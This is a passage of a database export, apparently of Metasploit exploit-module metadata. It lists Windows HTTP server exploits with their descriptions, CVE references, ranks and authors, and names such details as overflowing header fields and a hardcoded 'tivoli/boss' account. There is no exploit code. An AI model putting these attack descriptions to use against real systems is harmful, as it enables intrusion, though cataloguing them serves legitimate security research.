00:00:00",0,,"aggressive","t","CVE-2009-3711, OSVDB-58714, URL-http://www.pank4j.com/exploits/httpdxb0f.php, URL-http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/","Pankaj Kohli , Trancer , jduck " 811,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/httpdx_tolog_format.rb","exploit","windows/http/httpdx_tolog_format","exploit/windows/http/httpdx_tolog_format","HTTPDX tolog() Function Format String Vulnerability",500,"This module exploits a format string vulnerability in HTTPDX HTTP server. By sending an specially crafted HTTP request containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user via FTP.","Metasploit Framework License (BSD)","t","2009-11-17 00:00:00",0,,"aggressive","t","CVE-2009-4769, OSVDB-60182","jduck " 812,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ia_webmail.rb","exploit","windows/http/ia_webmail","exploit/windows/http/ia_webmail","IA WebMail 3.x Buffer Overflow",200,"This exploits a stack buffer overflow in the IA WebMail server. This exploit has not been tested against a live system at this time.","Metasploit Framework License (BSD)","f","2003-11-03 00:00:00",0,,"aggressive","t","BID-8965, CVE-2003-1192, OSVDB-2757, URL-http://www.k-otik.net/exploits/11.19.iawebmail.pl.php","hdm " 813,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb","exploit","windows/http/ibm_tivoli_endpoint_bof","exploit/windows/http/ibm_tivoli_endpoint_bof","IBM Tivoli Endpoint Manager POST Query Buffer Overflow",400,"This module exploits a stack based buffer overflow in the way IBM Tivoli Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query arguments. This issue can be triggered by sending a specially crafted HTTP POST request to the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization is required. This exploit makes use of a second vulnerability, a hardcoded account (tivoli/boss) is used to bypass the authorization restriction.","Metasploit Framework License (BSD)","t","2011-05-31 00:00:00",,,"aggressive","t","BID-48049, CVE-2011-1220, OSVDB-72713, OSVDB-72751, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-169/","Jeremy Brown <0xjbrown@gmail.com>, bannedit " 814,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb","exploit","windows/http/ibm_tpmfosd_overflow","exploit/windows/http/ibm_tpmfosd_overflow","IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow",400,"This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager for OS Deployment version 5.1.0.X.","Metasploit Framework License (BSD)","t","2007-05-02 00:00:00",0,,"aggressive","t","BID-23264, CVE-2007-1868, OSVDB-34678, URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-05","toto" 815,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ibm_tsm_cad_header.rb","exploit","windows/http/ibm_tsm_cad_header","exploit/windows/http/ibm_tsm_cad_header","IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",400,"This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-09-24 00:00:00",0,,"aggressive","t","BID-25743, CVE-2007-4880, OSVDB-38161","MC " 816,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/icecast_header.rb","exploit","windows/http/icecast_header","exploit/windows/http/icecast_header","Icecast (<= 2.0.1) Header Overwrite (win32)",500,"This module exploits a buffer overflow in the header parsing of icecast, discovered by Luigi Auriemma. Sending 32 HTTP headers will cause a write one past the end of a pointer array. On win32 this happens to overwrite the saved instruction pointer, and on linux (depending on compiler, etc) this seems to generally overwrite nothing crucial (read not exploitable). !! This exploit uses ExitThread(), this will leave icecast thinking the thread is still in use, and the thread counter won't be decremented. This means for each time your payload exits, the counter will be left incremented, and eventually the threadpool limit will be maxed. So you can multihit, but only till you fill the threadpool.","Metasploit Framework License (BSD)","f","2004-09-28 00:00:00",0,,"aggressive","t","BID-11271, CVE-2004-1561, OSVDB-10406, URL-http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html","Luigi Auriemma , spoonm " 817,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/integard_password_bof.rb","exploit","windows/http/integard_password_bof","exploit/windows/http/integard_password_bof","Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Race river's Integard Home/Pro internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are vulnerable. The administration web page on port 18881 is vulnerable to a remote buffer overflow attack. By sending an long character string in the password field, both the structured exception handler and the saved extended instruction pointer are over written, allowing an attacker to gain control of the application and the underlying operating system remotely. The administration website service runs with SYSTEM privileges, and automatically restarts when it crashes.","Metasploit Framework License (BSD)","f","2010-09-07 00:00:00",0,,"aggressive","t","OSVDB-67909, URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061","Lincoln, Nullthreat, corelanc0d3r , jduck , rick2600" 818,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/intersystems_cache.rb","exploit","windows/http/intersystems_cache","exploit/windows/http/intersystems_cache","InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow",500,"This module exploits a stack buffer overflow in InterSystems Cache 2009.1. By sending a specially crafted GET request, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-09-29 00:00:00",0,,"aggressive","t","BID-37177, OSVDB-60549","MC " 819,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb","exploit","windows/http/ipswitch_wug_maincfgret","exploit/windows/http/ipswitch_wug_maincfgret","Ipswitch WhatsUp Gold 8.03 Buffer Overflow",500,"This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By posting a long string for the value of 'instancename' in the _maincfgret.cgi script an attacker can overflow a buffer and execute arbitrary code on the system.","Metasploit Framework License (BSD)","t","2004-08-25 00:00:00",0,,"aggressive","t","BID-11043, CVE-2004-0798, OSVDB-9177","MC " 820,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/kolibri_http.rb","exploit","windows/http/kolibri_http","exploit/windows/http/kolibri_http","Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow",400,"This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.","Metasploit Framework License (BSD)","f","2010-12-26 00:00:00",0,,"aggressive","t","BID-6289, CVE-2002-2268, EDB-15834, OSVDB-70808","TheLeader, mr_me , sinn3r " 821,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb","exploit","windows/http/landesk_thinkmanagement_upload_asp","exploit/windows/http/landesk_thinkmanagement_upload_asp","LANDesk Lenovo ThinkManagement Console Remote Command Execution",600,"This module can be used to execute a payload on LANDesk Lenovo ThinkManagement Suite 9.0.2 and 9.0.3. The payload is uploaded as an ASP script by sending a specially crafted SOAP request to ""/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx"" , via a ""RunAMTCommand"" operation with the command '-PutUpdateFileCore' as the argument. After execution, the ASP script with the payload is deleted by sending another specially crafted SOAP request to ""WSVulnerabilityCore/VulCore.asmx"" via a ""SetTaskLogByFile"" operation.","Metasploit Framework License (BSD)","f","2012-02-15 00:00:00",0,,"aggressive","t","BID-52023, CVE-2012-1195, CVE-2012-1196, EDB-18622, EDB-18623, OSVDB-79276, OSVDB-79277","Andrea Micalizzi, juan vazquez " 822,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/mailenable_auth_header.rb","exploit","windows/http/mailenable_auth_header","exploit/windows/http/mailenable_auth_header","MailEnable Authorization Header Buffer Overflow",500,"This module exploits a remote buffer overflow in the MailEnable web service. The vulnerability is triggered when a large value is placed into the Authorization header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and MailEnable Professional versions prior to 1.55 are affected.","Metasploit Framework License (BSD)","f","2005-04-24 00:00:00",0,,"aggressive","t","BID-13350, CVE-2005-1348, OSVDB-15737, OSVDB-15913, URL-http://www.nessus.org/plugins/index.php?view=single&id=18123","David Maciejak " 823,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/manageengine_apps_mngr.rb","exploit","windows/http/manageengine_apps_mngr","exploit/windows/http/manageengine_apps_mngr","ManageEngine Applications Manager Authenticated Code Execution",200,"This module logs into the Manage Engine Appplications Manager to upload a payload to the file system and a batch script that executes the payload.","Metasploit Framework License (BSD)","f","2011-04-08 00:00:00",0,,"aggressive","t","EDB-17152","Jacob Giannantonio " 824,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/maxdb_webdbm_database.rb","exploit","windows/http/maxdb_webdbm_database","exploit/windows/http/maxdb_webdbm_database","MaxDB WebDBM Database Parameter Overflow",400,"This module exploits a stack buffer overflow in the MaxDB WebDBM service. By sending a specially-crafted HTTP request that contains an overly long database name. A remote attacker could overflow a buffer and execute arbitrary code on the system with privileges of the wahttp process. This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.","Metasploit Framework License (BSD)","t","2006-08-29 00:00:00",0,,"aggressive","t","BID-19660, CVE-2006-4305, OSVDB-28300","MC " 825,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb","exploit","windows/http/maxdb_webdbm_get_overflow","exploit/windows/http/maxdb_webdbm_get_overflow","MaxDB WebDBM GET Buffer Overflow",400,"This module exploits a stack buffer overflow in the MaxDB WebDBM service. This service is included with many recent versions of the MaxDB and SAPDB products. This particular module is capable of exploiting Windows systems through the use of an SEH frame overwrite. The offset to the SEH frame may change depending on where MaxDB has been installed, this module assumes a web root path with the same length as: C:\Program Files\sdb\programs\web\Documents","Metasploit Framework License (BSD)","t","2005-04-26 00:00:00",0,,"aggressive","t","BID-13368, CVE-2005-0684, OSVDB-15816, URL-http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities","hdm " 826,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/mcafee_epolicy_source.rb","exploit","windows/http/mcafee_epolicy_source","exploit/windows/http/mcafee_epolicy_source","McAfee ePolicy Orchestrator / ProtectionPilot Overflow",200,"This is an exploit for the McAfee HTTP Server (NAISERV.exe). McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are known to be vulnerable. By sending a large 'Source' header, the stack can be overwritten. This module is based on the exploit by xbxice and muts. Due to size constraints, this module uses the Egghunter technique.","Metasploit Framework License (BSD)","t","2006-07-17 00:00:00",,,"aggressive","t","BID-20288, CVE-2006-5156, EDB-2467, OSVDB-29421, URL-http://www.remote-exploit.org/advisories/mcafee-epo.pdf","hdm , muts , patrick , xbxice " 827,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb","exploit","windows/http/mdaemon_worldclient_form2raw","exploit/windows/http/mdaemon_worldclient_form2raw","MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow",500,"This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default), a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe, by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default), the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based overflow occurs when an excessively long From field is specified. The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes. Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait. Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will continue to crash/execute the payload until the CGI output is manually deleted from the queue in C:\MDaemon\RawFiles\*.raw.","Metasploit Framework License (BSD)","t","2003-12-29 00:00:00",0,,"aggressive","t","BID-9317, CVE-2003-1200, OSVDB-3255","patrick " 828,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/minishare_get_overflow.rb","exploit","windows/http/minishare_get_overflow","exploit/windows/http/minishare_get_overflow","Minishare 1.4.1 Buffer Overflow",200,"This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack buffer overflow that requires a ""jmp esp"" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.","BSD License","f","2004-11-07 00:00:00",,,"aggressive","t","BID-11620, CVE-2004-2271, OSVDB-11530, URL-http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html","acaro " 829,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/navicopa_get_overflow.rb","exploit","windows/http/navicopa_get_overflow","exploit/windows/http/navicopa_get_overflow","NaviCOPA 2.0.1 URL Handling Buffer Overflow",500,"This module exploits a stack buffer overflow in NaviCOPA 2.0.1. The vulnerability is caused due to a boundary error within the handling of URL parameters.","Metasploit Framework License (BSD)","t","2006-09-28 00:00:00",0,,"aggressive","t","BID-20250, CVE-2006-5112, OSVDB-29257","MC " 830,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/netdecision_http_bof.rb","exploit","windows/http/netdecision_http_bof","exploit/windows/http/netdecision_http_bof","NetDecision 4.5.1 HTTP Server Buffer Overflow",300,"This module exploits a vulnerability found in NetDecision's HTTP service (located in C:\Program Files\NetDecision\Bin\HttpSvr.exe). By supplying a long string of data to the URL, an overflow may occur if the data gets handled by HTTP Server's active window. In other words, in order to gain remote code execution, the victim is probably looking at HttpSvr's window.","Metasploit Framework License (BSD)","f","2012-02-24 00:00:00",0,,"aggressive","t","CVE-2012-1465, OSVDB-79651, URL-http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt, URL-http://secunia.com/advisories/48168/","Prabhu S Angadi, sinn3r " 831,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/novell_imanager_upload.rb","exploit","windows/http/novell_imanager_upload","exploit/windows/http/novell_imanager_upload","Novell iManager getMultiPartParameters Arbitrary File Upload",600,"This module exploits a directory traversal vulnerability which allows remote attackers to upload and execute arbitrary code. PortalModuleInstallManager","Metasploit Framework License (BSD)","t","2010-10-01 00:00:00",0,,"aggressive","t","OSVDB-68320, URL-http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-190/","jduck " 832,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/novell_messenger_acceptlang.rb","exploit","windows/http/novell_messenger_acceptlang","exploit/windows/http/novell_messenger_acceptlang","Novell Messenger Server 2.0 Accept-Language Overflow",200,"This module exploits a stack buffer overflow in Novell GroupWise Messenger Server v2.0. This flaw is triggered by any HTTP request with an Accept-Language header greater than 16 bytes. To overwrite the return address on the stack, we must first pass a memcpy() operation that uses pointers we supply. Due to the large list of restricted characters and the limitations of the current encoder modules, very few payloads are usable.","Metasploit Framework License (BSD)","t","2006-04-13 00:00:00",,,"aggressive","t","BID-17503, CVE-2006-0992, OSVDB-24617","hdm " 833,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/nowsms.rb","exploit","windows/http/nowsms","exploit/windows/http/nowsms","Now SMS/MMS Gateway Buffer Overflow",400,"This module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27. By sending a specially crafted GET request, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-02-19 00:00:00",0,,"aggressive","t","BID-27896, CVE-2008-0871, OSVDB-42953","MC " 834,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/oracle9i_xdb_pass.rb","exploit","windows/http/oracle9i_xdb_pass","exploit/windows/http/oracle9i_xdb_pass","Oracle 9i XDB HTTP PASS Overflow (win32)",500,"This module exploits a stack buffer overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on ""Variations in exploit methods between Linux and Windows"" presented at the Blackhat conference.","Metasploit Framework License (BSD)","t","2003-08-18 00:00:00",0,,"aggressive","t","BID-8375, CVE-2003-0727, OSVDB-2449, URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf","MC " 835,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/oracle_btm_writetofile.rb","exploit","windows/http/oracle_btm_writetofile","exploit/windows/http/oracle_btm_writetofile","Oracle Business Transaction Management FlashTunnelService Remote Code Execution",600,"This module exploits abuses the FlashTunnelService SOAP web service on Oracle Business Transaction Management 12.1.0.7 to upload arbitrary files, without authentication, using the WriteToFile method. The same method contains a directory traversal vulnerability, which allows to upload the files to arbitrary locations. In order to execute remote code two techniques are provided. If the Oracle app has been deployed in the same WebLogic Samples Domain a JSP can be uploaded to the web root. If a new Domain has been used to deploy the Oracle application, the Windows Management Instrumentation service can be used to execute arbitrary code. Both techniques has been successfully tested on default installs of Oracle BTM 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. Default path traversal depths are provided, but the user can configure the traversal depth using the DEPTH option.","Metasploit Framework License (BSD)","f","2012-08-07 00:00:00",0,,"aggressive","t","BID-54839, EDB-20318, OSVDB-85087","juan vazquez , rgod , sinn3r " 836,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/osb_uname_jlist.rb","exploit","windows/http/osb_uname_jlist","exploit/windows/http/osb_uname_jlist","Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",600,"This module exploits an authentication bypass vulnerability in login.php. In conjuction with the authentication bypass issue, the 'jlist' parameter in property_box.php can be used to execute arbitrary system commands. This module was tested against Oracle Secure Backup version 10.3.0.1.0","Metasploit Framework License (BSD)","t","2010-07-13 00:00:00",0,,"aggressive","t","CVE-2010-0904, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-118","MC " 837,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/peercast_url.rb","exploit","windows/http/peercast_url","exploit/windows/http/peercast_url","PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)",200,"This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.","Metasploit Framework License (BSD)","f","2006-03-08 00:00:00",,,"aggressive","t","BID-17040, CVE-2006-1148, OSVDB-23777, URL-http://www.infigo.hr/in_focus/INFIGO-2006-03-01","hdm " 838,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/php_apache_request_headers_bof.rb","exploit","windows/http/php_apache_request_headers_bof","exploit/windows/http/php_apache_request_headers_bof","PHP apache_request_headers Function Buffer Overflow",300,"This module exploits a stack based buffer overflow in the CGI version of PHP 5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the HTTP headers. This module has been tested against the thread safe version of PHP 5.4.2, from ""windows.php.net"", running with Apache 2.2.22 from ""apachelounge.com"".","Metasploit Framework License (BSD)","t","2012-05-08 00:00:00",0,,"aggressive","t","BID-53455, CVE-2012-2329, OSVDB-82215, URL-http://www.php.net/ChangeLog-5.php#5.4.3, URL-http://www.php.net/archive/2012.php#id2012-05-08-1, URL-https://bugzilla.redhat.com/show_bug.cgi?id=820000","Vincent Danen, juan vazquez " 839,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/privatewire_gateway.rb","exploit","windows/http/privatewire_gateway","exploit/windows/http/privatewire_gateway","Private Wire Gateway Buffer Overflow",200,"This exploits a buffer overflow in the ADMCREG.EXE used in the PrivateWire Online Registration Facility.","Metasploit Framework License (BSD)","f","2006-06-26 00:00:00",4,,"aggressive","t","BID-18647, CVE-2006-3252, OSVDB-26861","Michael Thumann " 840,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/psoproxy91_overflow.rb","exploit","windows/http/psoproxy91_overflow","exploit/windows/http/psoproxy91_overflow","PSO Proxy v0.91 Stack Buffer Overflow",200,"This module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten.","Metasploit Framework License (BSD)","f","2004-02-20 00:00:00",,,"aggressive","t","BID-9706, CVE-2004-0313, EDB-156, OSVDB-4028","patrick " 841,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/rabidhamster_r4_log.rb","exploit","windows/http/rabidhamster_r4_log","exploit/windows/http/rabidhamster_r4_log","RabidHamster R4 Log Entry sprintf() Buffer Overflow",300,"This module exploits a vulnerability found in RabidHamster R4's web server. By supplying a malformed HTTP request, it is possible to trigger a stack-based buffer overflow when generating a log, which may result in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-02-09 00:00:00",0,,"aggressive","t","OSVDB-79007, URL-http://aluigi.altervista.org/adv/r4_1-adv.txt, URL-http://secunia.com/advisories/47901/","Luigi Auriemma, sinn3r " 842,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sambar6_search_results.rb","exploit","windows/http/sambar6_search_results","exploit/windows/http/sambar6_search_results","Sambar 6 Search Results Buffer Overflow",300,"This module exploits a buffer overflow found in the /search/results.stm application that comes with Sambar 6. This code is a direct port of Andrew Griffiths's SMUDGE exploit, the only changes made were to the nops and payload. This exploit causes the service to die, whether you provided the correct target or not.","Metasploit Framework License (BSD)","f","2003-06-21 00:00:00",,,"aggressive","t","BID-9607, CVE-2004-2086, OSVDB-5786","Andrew Griffiths , hdm , patrick " 843,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb","exploit","windows/http/sap_configservlet_exec_noauth","exploit/windows/http/sap_configservlet_exec_noauth","SAP ConfigServlet Remote Code Execution",500,"This module allows remote code execution via operating system commands through the SAP ConfigServlet without any authentication. This module has been tested successfully with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.","Metasploit Framework License (BSD)","f","2012-11-01 00:00:00",0,,"aggressive","t","EDB-24996, OSVDB-92704, URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf","Andras Kabai, Dmitry Chastuhin" 844,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sap_host_control_cmd_exec.rb","exploit","windows/http/sap_host_control_cmd_exec","exploit/windows/http/sap_host_control_cmd_exec","SAP NetWeaver HostControl Command Injection",200,"This module exploits a command injection vulnerability in the SAPHostControl Service, by sending a specially crafted SOAP request to the management console. In order to deal with the spaces and length limitations, a WebDAV service is created to run an arbitrary payload when accessed as a UNC path. Because of this, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2012-08-14 00:00:00",0,,"passive","t","OSVDB-84821, URL-http://www.contextis.com/research/blog/sap4/, URL-https://websmp130.sap-ag.de/sap/support/notes/1341333","Michael Jordon, juan vazquez " 845,"2013-05-14 23:14:14","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb","exploit","windows/http/sap_mgmt_con_osexec_payload","exploit/windows/http/sap_mgmt_con_osexec_payload","SAP Management Console OSExecute Payload Execution",600,"This module executes an arbitrary payload through the SAP Management Console SOAP Interface. A valid username and password must be provided.","Metasploit Framework License (BSD)","t","2011-03-08 00:00:00",0,,"aggressive","t","URL-http://blog.c22.cc","Chris John Riley" 846,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sapdb_webtools.rb","exploit","windows/http/sapdb_webtools","exploit/windows/http/sapdb_webtools","SAP DB 7.4 WebTools Buffer Overflow",500,"This module exploits a stack buffer overflow in SAP DB 7.4 WebTools. By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-07-05 00:00:00",0,,"aggressive","t","BID-24773, CVE-2007-3614, OSVDB-37838","MC " 847,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/savant_31_overflow.rb","exploit","windows/http/savant_31_overflow","exploit/windows/http/savant_31_overflow","Savant 3.1 Web Server Overflow",500,"This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt generally causes a thread to die whether sucessful or not. Therefore, in a default configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the ""ord"" payloads is recommended.","Metasploit Framework License (BSD)","f","2002-09-10 00:00:00",0,,"aggressive","t","BID-5686, CVE-2002-1120, EDB-787, OSVDB-9829","patrick " 848,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/servu_session_cookie.rb","exploit","windows/http/servu_session_cookie","exploit/windows/http/servu_session_cookie","Rhinosoft Serv-U Session Cookie Buffer Overflow",400,"This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5. Sending a specially crafted POST request with an overly long session cookie string, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2009-11-01 00:00:00",1,,"aggressive","t","CVE-2009-4006, OSVDB-59772, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071370.html, URL-http://rangos.de/ServU-ADV.txt","M.Yanagishita , Nikolas Rangos , jduck " 849,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/shoutcast_format.rb","exploit","windows/http/shoutcast_format","exploit/windows/http/shoutcast_format","SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow",200,"This module exploits a format string vulnerability in the Nullsoft SHOUTcast server for Windows. The vulnerability is triggered by requesting a file path that contains format string specifiers. This vulnerability was discovered by Tomasz Trojanowski and Damian Put.","Metasploit Framework License (BSD)","f","2004-12-23 00:00:00",,,"aggressive","t","BID-12096, CVE-2004-1373, OSVDB-12585","MC , mandragore " 850,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/shttpd_post.rb","exploit","windows/http/shttpd_post","exploit/windows/http/shttpd_post","SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)",200,"This module exploits a stack buffer overflow in SHTTPD <= 1.34. The vulnerability is caused due to a boundary error within the handling of POST requests. Based on an original exploit by skOd but using a different method found by hdm.","Metasploit Framework License (BSD)","f","2006-10-06 00:00:00",,,"aggressive","t","BID-20393, CVE-2006-5216, OSVDB-29565, URL-http://shttpd.sourceforge.net","LMH , hdm , skOd" 851,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb","exploit","windows/http/solarwinds_storage_manager_sql","exploit/windows/http/solarwinds_storage_manager_sql","Solarwinds Storage Manager 5.1.0 SQL Injection",600,"This module exploits a SQL injection found in Solarwinds Storage Manager login interface. It will send a malicious SQL query to create a JSP file under the web root directory, and then let it download and execute our malicious executable under the context of SYSTEM.","Metasploit Framework License (BSD)","f","2011-12-07 00:00:00",0,,"passive","t","EDB-18818, OSVDB-81634, URL-http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html, URL-http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm","muts, r , sinn3r " 852,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb","exploit","windows/http/sonicwall_scrutinizer_sqli","exploit/windows/http/sonicwall_scrutinizer_sqli","Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection",600,"This module exploits a vulnerability found in Dell SonicWall Scrutinizer. While handling the 'q' parameter, the PHP application does not properly filter the user-supplied data, which can be manipulated to inject SQL commands, and then gain remote code execution. Please note that authentication is NOT needed to exploit this vulnerability.","Metasploit Framework License (BSD)","f","2012-07-22 00:00:00",0,,"aggressive","t","BID-54625, CVE-2012-2962, EDB-20033, OSVDB-84232, URL-http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf","Devon Kearns, muts, sinn3r " 853,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/steamcast_useragent.rb","exploit","windows/http/steamcast_useragent","exploit/windows/http/steamcast_useragent","Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow",200,"This module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending an overly long User-Agent in an HTTP GET request, an attacker may be able to execute arbitrary code.","BSD License","f","2008-01-24 00:00:00",1,,"aggressive","t","BID-33898, CVE-2008-0550, OSVDB-42670, URL-http://aluigi.altervista.org/adv/steamcazz-adv.txt","LSO , patrick " 854,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sws_connection_bof.rb","exploit","windows/http/sws_connection_bof","exploit/windows/http/sws_connection_bof","Simple Web Server Connection Header Buffer Overflow",300,"This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string data in the Connection Header to causes an overflow on the stack when function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3.","Metasploit Framework License (BSD)","f","2012-07-20 